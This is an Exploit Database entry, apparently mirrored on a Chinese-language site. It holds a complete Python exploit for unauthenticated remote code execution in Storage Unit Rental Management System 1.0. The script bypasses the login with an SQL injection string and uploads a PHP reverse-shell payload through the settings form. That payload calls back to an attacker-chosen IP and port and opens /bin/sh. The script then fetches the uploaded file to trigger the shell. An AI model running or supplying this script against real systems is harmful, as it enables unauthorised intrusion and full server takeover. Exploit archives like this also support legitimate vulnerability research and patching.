Storage Unit Rental Management System 1.0 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 12 阅读

• 作者： Ghuliev
  日期： 2021-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50348/

• # Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
  # Date: 28.09.2021
  # Exploit Author: Fikrat Ghuliev (Ghuliev)
  # Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
  # Version: 1
  # Tested on: Ubuntu
  
  import requests
  from bs4 import BeautifulSoup
  import sys
  import random
  import string
  import time
   
  if len(sys.argv) != 4:
  print("[~] Usage : python3 exploit.py localhost ip port")
  exit()
   
  site = sys.argv[1]
  ip = sys.argv[2]
  port = sys.argv[3]
  shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"
  
  letters = string.ascii_lowercase
  name = ''.join(random.choice(letters) for i in range(5)) 
  
  def LoginAndShellUpload():
  login = 'http://'+site+':80/storage/classes/Login.php?f=login'
  session = requests.session()
  post_data = {"username": "' OR 1=1-- -", "password": "aa"}
  user_login = session.post(login, data=post_data)
  cookie = session.cookies.get_dict()
  
  print('[+]Success login')
  print('[+]Try Shell upload')
  time.sleep(2)
  #shell upload
  url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
  cookies = cookie
  headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
  data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
  requests.post(url, headers=headers, cookies=cookies, data=data)
  print('[+]Success!')
  print('[+]Getting reverse shell')
  time.sleep(2)
  
  
  def RCE():
  
  path = 'http://'+site+'/storage/uploads/'
  html_text = requests.get(path).text
  soup = BeautifulSoup(html_text, 'html.parser')
  for link in soup.find_all('a'):
  data = link.get('href')
  with open('shell_location.txt', 'w') as f:
  f.write(data)
  
  path2 = 'shell_location.txt'
  shell_file = open(path2,'r')
  shell = shell_file.readline()
  
  r = requests.get('http://'+site+'/storage/uploads/'+shell)
  print(r.text)
  print('[+]Hacked!')
  
  
  
  LoginAndShellUpload()
  RCE()